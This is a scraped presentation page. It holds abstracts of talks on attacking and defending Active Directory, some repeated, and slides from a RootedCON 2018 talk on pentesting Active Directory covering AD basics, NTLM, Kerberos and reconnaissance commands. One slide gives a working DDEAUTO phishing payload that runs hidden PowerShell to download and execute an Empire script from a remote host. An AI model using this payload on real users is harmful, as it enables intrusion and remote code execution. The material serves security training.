Introducción a las pruebas de intrusión en entornos Microsoft Active Directory en forma de ponencia práctica para auditores o personas interesadas en el pentesting en entornos corporativos. Se dará una breve introducción al servicio de directorio Active Directory y sus componentes más críticos desde el punto de vista de la seguridad.Posteriormente, se explicarán las principales diferencias con respecto a un pentesting clásico de infraestructura, así como las técnicas y ataques más comunes para llevar a cabo el ejercicio y comprometer completamente el dominio corporativo.Requisitos: Se recomienda que los asistentes tengan conocimientos básicos de Active Directory y básicos/medios de pentesting o hacking ético, preferiblemente en infraestructuras y/o Sistemas Operativos.
FreeIPA is the open source answer to Active Directory, bringing the functionality of Kerberos and centralized management to the unix world. This talk will dive into the background of FreeIPA, how to attack it, and its parallels to traditional Active Directory. We will cover the FreeIPA equivalents of credential abuse, discovery, and lateral movement, highlighting the similarities and differences from traditional Active Directory tradecraft. This will culminate in multiple real-world demos showing how chains of abuse, previously accessible only in Windows environments, are now possible in the unix realm, providing a new medium for offensive research into Kerberos and LDAP environments.
This presentation was given at BSides Austin '15, and is an expanded version of the "I hunt sys admins" Shmoocon firetalk. It covers various ways to hunt for users in Windows domains, including using PowerView.
Presentation talks about introduction to MITRE ATT&CK Framework, different use cases, pitfalls to take care about.. Talk was delivered @Null Bangalore and @OWASP Bangalore chapter on 15th February 2019.
Fantastic Red Team Attacks and How to Find ThemRoss Wolf
Presented at Black Hat 2019
https://www.blackhat.com/us-19/briefings/schedule/index.html#fantastic-red-team-attacks-and-how-to-find-them-16540
Casey Smith (Red Canary)
Ross Wolf (Endgame)
bit.ly/fantastic19
Abstract:
Red team testing in organizations over the last year has shown a dramatic increase in detections mapped to MITRE ATT&CK™ across Windows, Linux and macOS. However, many organizations continue to miss several key techniques that, unsurprisingly, often blend in with day-to-day user operations. One example includes Trusted Developer Utilities which can be readily available on standard user endpoints, not just developer workstations, and such applications allow for code execution. Also, XSL Script processing can be used as an attack vector as there are a number of trusted utilities that can consume and execute scripts via XSL. And finally, in addition to these techniques, trusted .NET default binaries are known to allow unauthorized execution as well, these include tools like InstallUtil, Regsvcs and AddInProcess. Specific techniques, coupled with procedural difficulties within a team, such as alert fatigue and lack of understanding with environmental norms, make reliable detection of these events near impossible.
This talk summarizes prevalent and ongoing gaps across organizations uncovered by testing their defenses against a broad spectrum of attacks via Atomic Red Team. Many of these adversary behaviors are not atomic, but span multiple events in an event stream that may be arbitrarily and inconsistently separated in time by nuisance events.
Additionally, we introduce and demonstrate the open-sourced Event Query Language for creating high signal-to-noise analytics that close these prevalent behavioral gaps. EQL is event agnostic and can be used to craft analytics that readily link evidence across long sequences of log data. In a live demonstration, we showcase powerful but easy to craft analytics that catch adversarial behavior most commonly missed in organizations today.
FreeIPA is the open source answer to Active Directory, bringing the functionality of Kerberos and centralized management to the unix world. This talk will dive into the background of FreeIPA, how to attack it, and its parallels to traditional Active Directory. We will cover the FreeIPA equivalents of credential abuse, discovery, and lateral movement, highlighting the similarities and differences from traditional Active Directory tradecraft. This will culminate in multiple real-world demos showing how chains of abuse, previously accessible only in Windows environments, are now possible in the unix realm, providing a new medium for offensive research into Kerberos and LDAP environments.
This presentation was given at BSides Austin '15, and is an expanded version of the "I hunt sys admins" Shmoocon firetalk. It covers various ways to hunt for users in Windows domains, including using PowerView.
Presentation talks about introduction to MITRE ATT&CK Framework, different use cases, pitfalls to take care about.. Talk was delivered @Null Bangalore and @OWASP Bangalore chapter on 15th February 2019.
Fantastic Red Team Attacks and How to Find ThemRoss Wolf
Presented at Black Hat 2019
https://www.blackhat.com/us-19/briefings/schedule/index.html#fantastic-red-team-attacks-and-how-to-find-them-16540
Casey Smith (Red Canary)
Ross Wolf (Endgame)
bit.ly/fantastic19
Abstract:
Red team testing in organizations over the last year has shown a dramatic increase in detections mapped to MITRE ATT&CK™ across Windows, Linux and macOS. However, many organizations continue to miss several key techniques that, unsurprisingly, often blend in with day-to-day user operations. One example includes Trusted Developer Utilities which can be readily available on standard user endpoints, not just developer workstations, and such applications allow for code execution. Also, XSL Script processing can be used as an attack vector as there are a number of trusted utilities that can consume and execute scripts via XSL. And finally, in addition to these techniques, trusted .NET default binaries are known to allow unauthorized execution as well, these include tools like InstallUtil, Regsvcs and AddInProcess. Specific techniques, coupled with procedural difficulties within a team, such as alert fatigue and lack of understanding with environmental norms, make reliable detection of these events near impossible.
This talk summarizes prevalent and ongoing gaps across organizations uncovered by testing their defenses against a broad spectrum of attacks via Atomic Red Team. Many of these adversary behaviors are not atomic, but span multiple events in an event stream that may be arbitrarily and inconsistently separated in time by nuisance events.
Additionally, we introduce and demonstrate the open-sourced Event Query Language for creating high signal-to-noise analytics that close these prevalent behavioral gaps. EQL is event agnostic and can be used to craft analytics that readily link evidence across long sequences of log data. In a live demonstration, we showcase powerful but easy to craft analytics that catch adversarial behavior most commonly missed in organizations today.
PSConfEU - Offensive Active Directory (With PowerShell!)Will Schroeder
This talk covers PowerShell for offensive Active Directory operations with PowerView. It was given on April 21, 2016 at the PowerShell Conference EU 2016.
I'm in your cloud... reading everyone's email. Hacking Azure AD via Active Di...DirkjanMollema
Azure AD is everything but a domain controller in the cloud. This talk will cover what Azure AD is, how it is commonly integrated with Active Directory and how security boundaries extend into the cloud, covering sync account password recovery, privilege escalations in Azure AD and full admin account takeovers using limited on-premise privileges.
While Active Directory has been researched for years and the security boundaries and risks are generally well documented, more and more organizations are extending their network into the cloud. A prime example of this is Office 365, which Microsoft offers through their Azure cloud. Connecting the on-premise Active Directory with the cloud introduces new attack surface both for the cloud and the on-premise directory.
This talk looks at the way the trust between Active Directory and Azure is set up and can be abused through the Azure AD Connect tool. We will take a dive into how the synchronization is set up, how the high-privilege credentials for both the cloud and Active Directory are protected (and can be obtained) and what permissions are associated with these accounts.
The talk will outline how a zero day in common setups was discovered through which on-premise users with limited privileges could take over the highest administration account in Azure and potentially compromise all cloud assets.
We will also take a look at the Azure AD architecture and common roles, and how attackers could backdoor or escalate privileges in cloud setups.
Lastly we will look at how to prevent against these kind of attacks and why your AD Connect server is perhaps one of the most critical assets in the on-premise infrastructure.
Every IR presents unique challenges. But - when an attacker uses PowerShell, WMI, Kerberos attacks, novel persistence mechanisms, seemingly unlimited C2 infrastructure and half-a-dozen rapidly-evolving malware families across a 100k node network to compromise the environment at a rate of 10 systems per day - the cumulative challenges can become overwhelming. This talk will showcase the obstacles overcome during one of the largest and most advanced breaches Mandiant has ever responded to, the novel investigative techniques employed, and the lessons learned that allowed us to help remediate it.
Details a massive intrusion by Russian APT29 (AKA CozyDuke, Cozy Bear)
Identifying privilege escalation paths within an Active Directory environment is crucial for a successful red team. Over the last few years, BloodHound has made it easier for red teamers to perform reconnaissance activities and identify these attacks paths. When evaluating BloodHound data, it is common to find ourselves having sufficient rights to modify a Group Policy Object (GPO). This level of access allows us to perform a number of attacks, targeting any computer or user object controlled by the vulnerable GPO.
In this talk we will present previous research related to GPO abuses and share a number of misconfigurations we have found in the wild. We will also present a tool that allows red teamers to target users and computers controlled by a vulnerable GPO in order to escalate privileges and move laterally within the environment.
Hunting for APT in network logs workshop presentationOlehLevytskyi1
Nonamecon 2021 presentation.
Network logs are one of the most efficient sources to hunt adversaries, but building good analytics capabilities require a deep understanding of benign activity and attacker behavior. This training focuses on detecting real-case attacks, tools and scenarios by the past year.
The training is highly interactive and retains a good balance between theory and a lot of hands-on exercises for the students to get used to the detection engineering methodology and prepare them to start implementing this at their organizations.
Presentation topics:
- Netflow Mitre Matrix view
- Full packet captures vs Netflow
- Zeek
- Zeek packages
- RDP initial comprometation
- Empire Powershell and CobaltStrike or what to expect after initial loader execution.
- Empire powershell initial connection
- Beaconing. RITA
- Scanning detection
- Internal enumeration detection
- Lateral movement techniques widely used
- Kerberos attacks
- PSExec and fileless ways of delivering payloads in the network
- Zerologon detection
- Data exfiltration
- Data exfiltration over C2 channel
- Data exfiltration using time size limits (data chunks)
- DNS exfiltration
- Detecting ransomware in your network
- Real incident investigation
Authors:
Oleh Levytskyi (https://twitter.com/LeOleg97)
Bogdan Vennyk (https://twitter.com/bogdanvennyk)
Red vs Blue- Modern Atice Directory Attacks, Detection & Protection by Sean M...Shakacon
While Kerberos "Golden Tickets" and "Silver Tickets" received a lot of press in the second half of 2014, there hasn't been much detail provided on how exactly they work, why they are successful, and how to mitigate them (other than: "don't get pwned"). Golden Tickets are the ultimate method for persistent, forever AD admin rights to a network since they are valid Kerberos tickets and can't be detected, right?
This talk covers the latest Active Directory attack vectors and describes how to detect Golden Ticket usage. Provided are key indicators that can detect Kerberos attacks on your network, including Golden tickets, Silver tickets & MS14-068 exploitation, as well as methods to identify, mitigate, and prevent common Active Directory attack vectors. When forged Kerberos tickets are used in AD, there are some interesting artifacts that can be identified. Yes, despite what you may have read on the internet, there are ways to detect Golden & Silver Ticket usage!
Some of the topics covered:
How attackers go from zero to (Domain) Admin
MS14-068: the vulnerability, the exploit, and the danger
"SPN Scanning" with PowerShell to identify potential targets without network scans (SQL, Exchange, FIM, webservers, etc.)
Exploiting weak service account passwords as a regular AD user
Mimikatz, the attacker's multi-tool
Using Silver Tickets for stealthy persistence that won’t be detected (until now)
Identifying forged Kerberos tickets (Golden & Silver Tickets) on your network
Detecting offensive PowerShell tools like Invoke-Mimikatz
Active Directory attack mitigation
Kerberos expertise is not required since the presentation covers how Active Directory leverages Kerberos for authentication identifying the areas useful for attack. Information presented is useful for both Red Team & Blue Team members as well as AD administrators.
Polyglot payloads in practice by avlidienbrunn at HackPraMathias Karlsson
A lecture/talk describing how to build and use polyglot payloads for finding vulnerabilities in web applications that traditional payloads can't.
Here's the last slide: http://www.slideshare.net/MathiasKarlsson2/final-slide-36636479
Practical Red Teaming is a hands-on class designed to teach participants with various techniques and tools for performing red teaming attacks. The goal of the training is to give a red teamer’s perspective to participants who want to go beyond VAPT. This intense course immerses students in a simulated enterprise environment, with multiple domains, up-to-date and patched operating systems. We will cover several phases of a Red Team engagement in depth – Local Privilege escalation, Domain Enumeration, Admin Recon, Lateral movement, Domain Admin privileges etc.
If you want to learn how to perform Red Team operations, sharpen your red teaming skillset, or understand how to defend against modern attacks, Practical Red Teaming is the course for you.
Topics :
• Red Team philosophy/overview
• Red Teaming vs Penetration Testing
• Active Directory Fundamentals – Forests, Domains, OU’s etc
• Assume Breach Methodology
• Insider Attack Simulation
• Introduction to PowerShell
• Initial access methods
• Privilege escalation methods through abuse of misconfigurations
• Domain Enumeration
• Lateral Movement and Pivoting
• Single sign-on in Active Directory
• Abusing built-in functionality for code execution
• Credential Replay
• Domain privileges abuse
• Dumping System and Domain Secrets
• Kerberos – Basics and its Fundamentals
• Kerberos Attack and Defense (Kerberoasting, Silver ticket, Golden ticket attack etc)
https://bsidessg.org/schedule/2019-ajaychoudhary-and-niteshmalviya/
Demystifying SharePoint Infrastructure – for NON-IT People SPC Adriatics
This talk is specifically for NON-SharePoint infrastructure administrators (or for new ones still figuring things out)! Instead it’s for the rest of the SharePoint team – come learn about the basic building blocks of SharePoint infrastructure – things like DNS, load balancing, AD, high availability and disaster recovery, backup options, database options, and some of the core components of Windows in an understandable way so you can speak the lingo and seem really smart!
Zvonimir Mavretić
PSConfEU - Offensive Active Directory (With PowerShell!)Will Schroeder
This talk covers PowerShell for offensive Active Directory operations with PowerView. It was given on April 21, 2016 at the PowerShell Conference EU 2016.
I'm in your cloud... reading everyone's email. Hacking Azure AD via Active Di...DirkjanMollema
Azure AD is everything but a domain controller in the cloud. This talk will cover what Azure AD is, how it is commonly integrated with Active Directory and how security boundaries extend into the cloud, covering sync account password recovery, privilege escalations in Azure AD and full admin account takeovers using limited on-premise privileges.
While Active Directory has been researched for years and the security boundaries and risks are generally well documented, more and more organizations are extending their network into the cloud. A prime example of this is Office 365, which Microsoft offers through their Azure cloud. Connecting the on-premise Active Directory with the cloud introduces new attack surface both for the cloud and the on-premise directory.
This talk looks at the way the trust between Active Directory and Azure is set up and can be abused through the Azure AD Connect tool. We will take a dive into how the synchronization is set up, how the high-privilege credentials for both the cloud and Active Directory are protected (and can be obtained) and what permissions are associated with these accounts.
The talk will outline how a zero day in common setups was discovered through which on-premise users with limited privileges could take over the highest administration account in Azure and potentially compromise all cloud assets.
We will also take a look at the Azure AD architecture and common roles, and how attackers could backdoor or escalate privileges in cloud setups.
Lastly we will look at how to prevent against these kind of attacks and why your AD Connect server is perhaps one of the most critical assets in the on-premise infrastructure.
Every IR presents unique challenges. But - when an attacker uses PowerShell, WMI, Kerberos attacks, novel persistence mechanisms, seemingly unlimited C2 infrastructure and half-a-dozen rapidly-evolving malware families across a 100k node network to compromise the environment at a rate of 10 systems per day - the cumulative challenges can become overwhelming. This talk will showcase the obstacles overcome during one of the largest and most advanced breaches Mandiant has ever responded to, the novel investigative techniques employed, and the lessons learned that allowed us to help remediate it.
Details a massive intrusion by Russian APT29 (AKA CozyDuke, Cozy Bear)
Identifying privilege escalation paths within an Active Directory environment is crucial for a successful red team. Over the last few years, BloodHound has made it easier for red teamers to perform reconnaissance activities and identify these attacks paths. When evaluating BloodHound data, it is common to find ourselves having sufficient rights to modify a Group Policy Object (GPO). This level of access allows us to perform a number of attacks, targeting any computer or user object controlled by the vulnerable GPO.
In this talk we will present previous research related to GPO abuses and share a number of misconfigurations we have found in the wild. We will also present a tool that allows red teamers to target users and computers controlled by a vulnerable GPO in order to escalate privileges and move laterally within the environment.
Hunting for APT in network logs workshop presentationOlehLevytskyi1
Nonamecon 2021 presentation.
Network logs are one of the most efficient sources to hunt adversaries, but building good analytics capabilities require a deep understanding of benign activity and attacker behavior. This training focuses on detecting real-case attacks, tools and scenarios by the past year.
The training is highly interactive and retains a good balance between theory and a lot of hands-on exercises for the students to get used to the detection engineering methodology and prepare them to start implementing this at their organizations.
Presentation topics:
- Netflow Mitre Matrix view
- Full packet captures vs Netflow
- Zeek
- Zeek packages
- RDP initial comprometation
- Empire Powershell and CobaltStrike or what to expect after initial loader execution.
- Empire powershell initial connection
- Beaconing. RITA
- Scanning detection
- Internal enumeration detection
- Lateral movement techniques widely used
- Kerberos attacks
- PSExec and fileless ways of delivering payloads in the network
- Zerologon detection
- Data exfiltration
- Data exfiltration over C2 channel
- Data exfiltration using time size limits (data chunks)
- DNS exfiltration
- Detecting ransomware in your network
- Real incident investigation
Authors:
Oleh Levytskyi (https://twitter.com/LeOleg97)
Bogdan Vennyk (https://twitter.com/bogdanvennyk)
Red vs Blue- Modern Atice Directory Attacks, Detection & Protection by Sean M...Shakacon
While Kerberos "Golden Tickets" and "Silver Tickets" received a lot of press in the second half of 2014, there hasn't been much detail provided on how exactly they work, why they are successful, and how to mitigate them (other than: "don't get pwned"). Golden Tickets are the ultimate method for persistent, forever AD admin rights to a network since they are valid Kerberos tickets and can't be detected, right?
This talk covers the latest Active Directory attack vectors and describes how to detect Golden Ticket usage. Provided are key indicators that can detect Kerberos attacks on your network, including Golden tickets, Silver tickets & MS14-068 exploitation, as well as methods to identify, mitigate, and prevent common Active Directory attack vectors. When forged Kerberos tickets are used in AD, there are some interesting artifacts that can be identified. Yes, despite what you may have read on the internet, there are ways to detect Golden & Silver Ticket usage!
Some of the topics covered:
How attackers go from zero to (Domain) Admin
MS14-068: the vulnerability, the exploit, and the danger
"SPN Scanning" with PowerShell to identify potential targets without network scans (SQL, Exchange, FIM, webservers, etc.)
Exploiting weak service account passwords as a regular AD user
Mimikatz, the attacker's multi-tool
Using Silver Tickets for stealthy persistence that won’t be detected (until now)
Identifying forged Kerberos tickets (Golden & Silver Tickets) on your network
Detecting offensive PowerShell tools like Invoke-Mimikatz
Active Directory attack mitigation
Kerberos expertise is not required since the presentation covers how Active Directory leverages Kerberos for authentication identifying the areas useful for attack. Information presented is useful for both Red Team & Blue Team members as well as AD administrators.
Polyglot payloads in practice by avlidienbrunn at HackPraMathias Karlsson
A lecture/talk describing how to build and use polyglot payloads for finding vulnerabilities in web applications that traditional payloads can't.
Here's the last slide: http://www.slideshare.net/MathiasKarlsson2/final-slide-36636479
Practical Red Teaming is a hands-on class designed to teach participants with various techniques and tools for performing red teaming attacks. The goal of the training is to give a red teamer’s perspective to participants who want to go beyond VAPT. This intense course immerses students in a simulated enterprise environment, with multiple domains, up-to-date and patched operating systems. We will cover several phases of a Red Team engagement in depth – Local Privilege escalation, Domain Enumeration, Admin Recon, Lateral movement, Domain Admin privileges etc.
If you want to learn how to perform Red Team operations, sharpen your red teaming skillset, or understand how to defend against modern attacks, Practical Red Teaming is the course for you.
Topics :
• Red Team philosophy/overview
• Red Teaming vs Penetration Testing
• Active Directory Fundamentals – Forests, Domains, OU’s etc
• Assume Breach Methodology
• Insider Attack Simulation
• Introduction to PowerShell
• Initial access methods
• Privilege escalation methods through abuse of misconfigurations
• Domain Enumeration
• Lateral Movement and Pivoting
• Single sign-on in Active Directory
• Abusing built-in functionality for code execution
• Credential Replay
• Domain privileges abuse
• Dumping System and Domain Secrets
• Kerberos – Basics and its Fundamentals
• Kerberos Attack and Defense (Kerberoasting, Silver ticket, Golden ticket attack etc)
https://bsidessg.org/schedule/2019-ajaychoudhary-and-niteshmalviya/
Demystifying SharePoint Infrastructure – for NON-IT People SPC Adriatics
This talk is specifically for NON-SharePoint infrastructure administrators (or for new ones still figuring things out)! Instead it’s for the rest of the SharePoint team – come learn about the basic building blocks of SharePoint infrastructure – things like DNS, load balancing, AD, high availability and disaster recovery, backup options, database options, and some of the core components of Windows in an understandable way so you can speak the lingo and seem really smart!
Zvonimir Mavretić
Cisco Trustsec & Security Group TaggingCisco Canada
This presentation covers the protocols and functions that create a trusted network. We will discuss the best practices when deploying this tagging ability using campus switches including migration techniques from non-SGT capable to devices to a fully SGT capable network deployment. For more information please visit our website here: http://www.cisco.com/web/CA/index.html
InSecure Remote Operations - NullCon 2023 by Yossi SassiYossi Sassi
Every admin tool is an attack tool, yet there are no good or bad shells - that part is up to you. Coming from dozens of engagements consulting various role-based remote operations architectures & Red Team assessments for organizations in 4 continents, with a fresh research hijacking full tokens from network logon-type sessions - we’ll dive into a technical, hands-on set of examples for both Offensive and Defensive teams, of what SUCKS and what ROCKS on the Windows ‘Living off the land’ remote admin operations, Protocols, and APIs. We'll talk about the Pros and Cons of jump server architectures, as well as role-based shells, limiting PowerShell in creative ways. We'll also introduce fresh research to achieve Full Token hijack from network logon-type sessions, without any hash and/or TGT!
New Approaches for Fraud Detection on Apache Kafka and KSQLconfluent
Speakers: Dale Kim, Sr. Director, Products/Solutions, Arcadia Data + Chong Yan, Solutions Architect, Confluent
When it comes to corporate fraud, early detection is integral to mitigating and preventing drastic damage.
Modern streaming data technologies like Apache Kafka® and Confluent KSQL, the streaming SQL engine for Apache Kafka, can help companies catch and detect fraud in real time instead of after the fact. Kafka is ideal for managing fast, incoming data points, and KSQL provides the de facto standard for reading that data. Combine this with Arcadia Data visualizations designed for modern data types, and you have a powerful foundation for combating fraud.
You will learn:
-Why traditional batch-driven approaches to fraud detection are insufficient today
-Why Apache Kafka is widely used for real-time fraud detection
-How KSQL and real-time visualizations open more opportunities for searching for fraud
Presentation of a few mechanisms that can help to automate the bootstrap process in IoT environment.
This is the summary of my work done during an 8 weeks internship at red hat
TechWiseTV Workshop: Cisco Stealthwatch and ISERobb Boyd
Replay the live event: http://cs.co/90008z2Ar
Learn how your existing Cisco network can help you to know exactly who is doing what on the network with end-to-end visibility, differentiate anomalies from normal behavior with contextual threat intelligence and stop threats and mitigate risk with one-click containment of users and devices.
It’s time for the network to protect itself. Please make time for this important workshop.
Resources:
Watch the Cisco Stealthwatch and ISE full episode: http://cs.co/90008z24M
Network as a Sensor-Enforcer on CCO:
http://www.cisco.com/c/en/us/solutions/enterprise-networks/enterprise-network-security/net-sensor.html
Cisco ISE Community
http://cs.co/ise-community
Cloud Platform Symantec Meetup Nov 2014Miguel Zuniga
Openstack Lessons learned
Continuous Integration and Deployment using Openstack
Tuning Openstack for High Availability and Performance in Large Production Deployments
Similar to Carlos García - Pentesting Active Directory [rooted2018] (20)
Epistemic Interaction - tuning interfaces to provide information for AI supportAlan Dix
Paper presented at SYNERGY workshop at AVI 2024, Genoa, Italy. 3rd June 2024
https://alandix.com/academic/papers/synergy2024-epistemic/
As machine learning integrates deeper into human-computer interactions, the concept of epistemic interaction emerges, aiming to refine these interactions to enhance system adaptability. This approach encourages minor, intentional adjustments in user behaviour to enrich the data available for system learning. This paper introduces epistemic interaction within the context of human-system communication, illustrating how deliberate interaction design can improve system understanding and adaptation. Through concrete examples, we demonstrate the potential of epistemic interaction to significantly advance human-computer interaction by leveraging intuitive human communication strategies to inform system design and functionality, offering a novel pathway for enriching user-system engagements.
Dr. Sean Tan, Head of Data Science, Changi Airport Group
Discover how Changi Airport Group (CAG) leverages graph technologies and generative AI to revolutionize their search capabilities. This session delves into the unique search needs of CAG’s diverse passengers and customers, showcasing how graph data structures enhance the accuracy and relevance of AI-generated search results, mitigating the risk of “hallucinations” and improving the overall customer journey.
Unlocking Productivity: Leveraging the Potential of Copilot in Microsoft 365, a presentation by Christoforos Vlachos, Senior Solutions Manager – Modern Workplace, Uni Systems
Pushing the limits of ePRTC: 100ns holdover for 100 daysAdtran
At WSTS 2024, Alon Stern explored the topic of parametric holdover and explained how recent research findings can be implemented in real-world PNT networks to achieve 100 nanoseconds of accuracy for up to 100 days.
State of ICS and IoT Cyber Threat Landscape Report 2024 previewPrayukth K V
The IoT and OT threat landscape report has been prepared by the Threat Research Team at Sectrio using data from Sectrio, cyber threat intelligence farming facilities spread across over 85 cities around the world. In addition, Sectrio also runs AI-based advanced threat and payload engagement facilities that serve as sinks to attract and engage sophisticated threat actors, and newer malware including new variants and latent threats that are at an earlier stage of development.
The latest edition of the OT/ICS and IoT security Threat Landscape Report 2024 also covers:
State of global ICS asset and network exposure
Sectoral targets and attacks as well as the cost of ransom
Global APT activity, AI usage, actor and tactic profiles, and implications
Rise in volumes of AI-powered cyberattacks
Major cyber events in 2024
Malware and malicious payload trends
Cyberattack types and targets
Vulnerability exploit attempts on CVEs
Attacks on counties – USA
Expansion of bot farms – how, where, and why
In-depth analysis of the cyber threat landscape across North America, South America, Europe, APAC, and the Middle East
Why are attacks on smart factories rising?
Cyber risk predictions
Axis of attacks – Europe
Systemic attacks in the Middle East
Download the full report from here:
https://sectrio.com/resources/ot-threat-landscape-reports/sectrio-releases-ot-ics-and-iot-security-threat-landscape-report-2024/
Threats to mobile devices are more prevalent and increasing in scope and complexity. Users of mobile devices desire to take full advantage of the features
available on those devices, but many of the features provide convenience and capability but sacrifice security. This best practices guide outlines steps the users can take to better protect personal devices and information.
GraphSummit Singapore | The Future of Agility: Supercharging Digital Transfor...Neo4j
Leonard Jayamohan, Partner & Generative AI Lead, Deloitte
This keynote will reveal how Deloitte leverages Neo4j’s graph power for groundbreaking digital twin solutions, achieving a staggering 100x performance boost. Discover the essential role knowledge graphs play in successful generative AI implementations. Plus, get an exclusive look at an innovative Neo4j + Generative AI solution Deloitte is developing in-house.
The Art of the Pitch: WordPress Relationships and SalesLaura Byrne
Clients don’t know what they don’t know. What web solutions are right for them? How does WordPress come into the picture? How do you make sure you understand scope and timeline? What do you do if sometime changes?
All these questions and more will be explored as we talk about matching clients’ needs with what your agency offers without pulling teeth or pulling your hair out. Practical tips, and strategies for successful relationship building that leads to closing the deal.
LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...DanBrown980551
Do you want to learn how to model and simulate an electrical network from scratch in under an hour?
Then welcome to this PowSyBl workshop, hosted by Rte, the French Transmission System Operator (TSO)!
During the webinar, you will discover the PowSyBl ecosystem as well as handle and study an electrical network through an interactive Python notebook.
PowSyBl is an open source project hosted by LF Energy, which offers a comprehensive set of features for electrical grid modelling and simulation. Among other advanced features, PowSyBl provides:
- A fully editable and extendable library for grid component modelling;
- Visualization tools to display your network;
- Grid simulation tools, such as power flows, security analyses (with or without remedial actions) and sensitivity analyses;
The framework is mostly written in Java, with a Python binding so that Python developers can access PowSyBl functionalities as well.
What you will learn during the webinar:
- For beginners: discover PowSyBl's functionalities through a quick general presentation and the notebook, without needing any expert coding skills;
- For advanced developers: master the skills to efficiently apply PowSyBl functionalities to your real-world scenarios.
Transcript: Selling digital books in 2024: Insights from industry leaders - T...BookNet Canada
The publishing industry has been selling digital audiobooks and ebooks for over a decade and has found its groove. What’s changed? What has stayed the same? Where do we go from here? Join a group of leading sales peers from across the industry for a conversation about the lessons learned since the popularization of digital books, best practices, digital book supply chain management, and more.
Link to video recording: https://bnctechforum.ca/sessions/selling-digital-books-in-2024-insights-from-industry-leaders/
Presented by BookNet Canada on May 28, 2024, with support from the Department of Canadian Heritage.
Communications Mining Series - Zero to Hero - Session 1DianaGray10
This session provides introduction to UiPath Communication Mining, importance and platform overview. You will acquire a good understand of the phases in Communication Mining as we go over the platform with you. Topics covered:
• Communication Mining Overview
• Why is it important?
• How can it help today’s business and the benefits
• Phases in Communication Mining
• Demo on Platform overview
• Q/A
GraphRAG is All You need? LLM & Knowledge GraphGuy Korland
Guy Korland, CEO and Co-founder of FalkorDB, will review two articles on the integration of language models with knowledge graphs.
1. Unifying Large Language Models and Knowledge Graphs: A Roadmap.
https://arxiv.org/abs/2306.08302
2. Microsoft Research's GraphRAG paper and a review paper on various uses of knowledge graphs:
https://www.microsoft.com/en-us/research/blog/graphrag-unlocking-llm-discovery-on-narrative-private-data/
In his public lecture, Christian Timmerer provides insights into the fascinating history of video streaming, starting from its humble beginnings before YouTube to the groundbreaking technologies that now dominate platforms like Netflix and ORF ON. Timmerer also presents provocative contributions of his own that have significantly influenced the industry. He concludes by looking at future challenges and invites the audience to join in a discussion.
PHP Frameworks: I want to break free (IPC Berlin 2024)Ralf Eggert
In this presentation, we examine the challenges and limitations of relying too heavily on PHP frameworks in web development. We discuss the history of PHP and its frameworks to understand how this dependence has evolved. The focus will be on providing concrete tips and strategies to reduce reliance on these frameworks, based on real-world examples and practical considerations. The goal is to equip developers with the skills and knowledge to create more flexible and future-proof web applications. We'll explore the importance of maintaining autonomy in a rapidly changing tech landscape and how to make informed decisions in PHP development.
This talk is aimed at encouraging a more independent approach to using PHP frameworks, moving towards a more flexible and future-proof approach to PHP development.
Climate Impact of Software Testing at Nordic Testing DaysKari Kakkonen
My slides at Nordic Testing Days 6.6.2024
Climate impact / sustainability of software testing discussed on the talk. ICT and testing must carry their part of global responsibility to help with the climat warming. We can minimize the carbon footprint but we can also have a carbon handprint, a positive impact on the climate. Quality characteristics can be added with sustainability, and then measured continuously. Test environments can be used less, and in smaller scale and on demand. Test techniques can be used in optimizing or minimizing number of tests. Test automation can be used to speed up testing.
2. ciyinet
WHOAMI Carlos García García
- Computer Science Engineer
- Penetration Testing and Red Teaming
- OSCP Certified
- Co-author book “Hacking Windows:
Ataques a sistemas y redes Microsoft”
2Pentesting Active Directory
3. ciyinet
WHAT ARE
WE GOING
TO TALK
ABOUT?
- Introduction to Active Directory
- Authentication Protocols
- Active Directory Penetration Testing
- Reconnaissance
- Common Attacks & Techniques
- Lateral and Vertical Movements
- How-to Avoid Being Caught
3Pentesting Active Directory
4. ciyinet
BEAR IN
MIND
- AD-related techniques
- I learn Active Directory from the
offensive side
- We lower risks and not the other
way around
- This is going to be intense
4Pentesting Active Directory
6. ciyinet
ACTIVE DIRECTORY 101
• AD is Microsoft’s answer to directory services
• Directory service is a hierarchical structure to store objects for
quick access and management of all resources
6Pentesting Active Directory
7. ciyinet
ACTIVE DIRECTORY 101
• Uses LDAP as its access protocol
• Relies on DNS as its locator service, enabling clients to locate
domain controllers through DNS queries
• AD supports several Naming Conventions
• User Principal Names (UPN):
• user@domain
• LDAP names (Distinguished Names):
• cn=common name
• ou=organizational unit
• dc=domain
• for eg. cn=ciyi, ou=Madrid, dc=Rooted, dc=CON
7Pentesting Active Directory
12. ciyinet 12
NTLM SCHEME
Pentesting Active Directory
Protocol Algorithm Secret to use
LM DES-ECB Hash LM
NTLMv1 DES-ECB Hash NT
NTLMv2 HMAC-MD5 Hash NT
14. ciyinet 14
KERBEROS SCHEME
Pentesting Active Directory
1. Client encrypts a
timestamp with his/her
hash/key
2. Client receives a TGT
signed with the domain
krbtgt account that
proves they are who
they say they are
3. The TGT is then used
to request service
tickets (TGS) for specific
resources/services on
the domain.
4. DC sends a TGS
ticket encrypted using
the hash of the
account that is
associated with that
service (SPN)
Protocol Secret to use
Kerberos
RC4 = Hash NT
AES128 key
AES256 key
27. ciyinet 27
PHISHING + DDEAUTO = RCE
• Dynamic Data Exchange (DDE): protocol for transferring data
between applications
• Valid for MS Excel, MS Word… and MS Outlook
• Recently used as macro-less Malware
DDEAUTO
"C:ProgramsMicrosoftOffice365Outlook........windowssystem
32WindowsPowerShellv1.0powershell.exe -NoP -sta -NonI -W Hidden
$e=(New-Object
System.Net.WebClient).DownloadString('http://172.16.201.201:8000/empire-
test.ps1');powershell -e $e # " "Beneficios Qurtuba"
Pentesting Active Directory
31. ciyinet
LOCAL RECONNAISSANCE
Collect information of the network, process and OS in order to
investigate what kind of machine we succeeded in infecting
Command Description
ipconfig /all Displays the IP address, subnet mask, and default gateway for all
adapters. Also info about DHCP and DNS settings
whoami /all Displays all information in the current access token, including the
current user name, security identifiers (SID), privileges, and groups that
the current user belongs to
net localgroup Displays the name of the server and the names of local groups on the
computer.
net localgroup “administrators” Displays local administrators
netstat -an Displays active TCP connections, ports on which the computer is
listening, Ethernet statistics, the IP routing table
tasklist /V Displays a list of applications and services with their Process ID (PID) for
all tasks running on either a local or a remote computer
31Pentesting Active Directory
32. ciyinet
LOCAL RECONNAISSANCE
Collect information of the network, process and OS in order to
investigate what kind of machine we succeeded in infecting
Command Description
net start Lists started Windows services
sc qc <SERVICE> Gets the parameters for an individual service
accesschk.exe -ucqv
<SERVICE>
Determine service access control rules (accesschk.exe is part of Microsoft
Sysinternals suite)
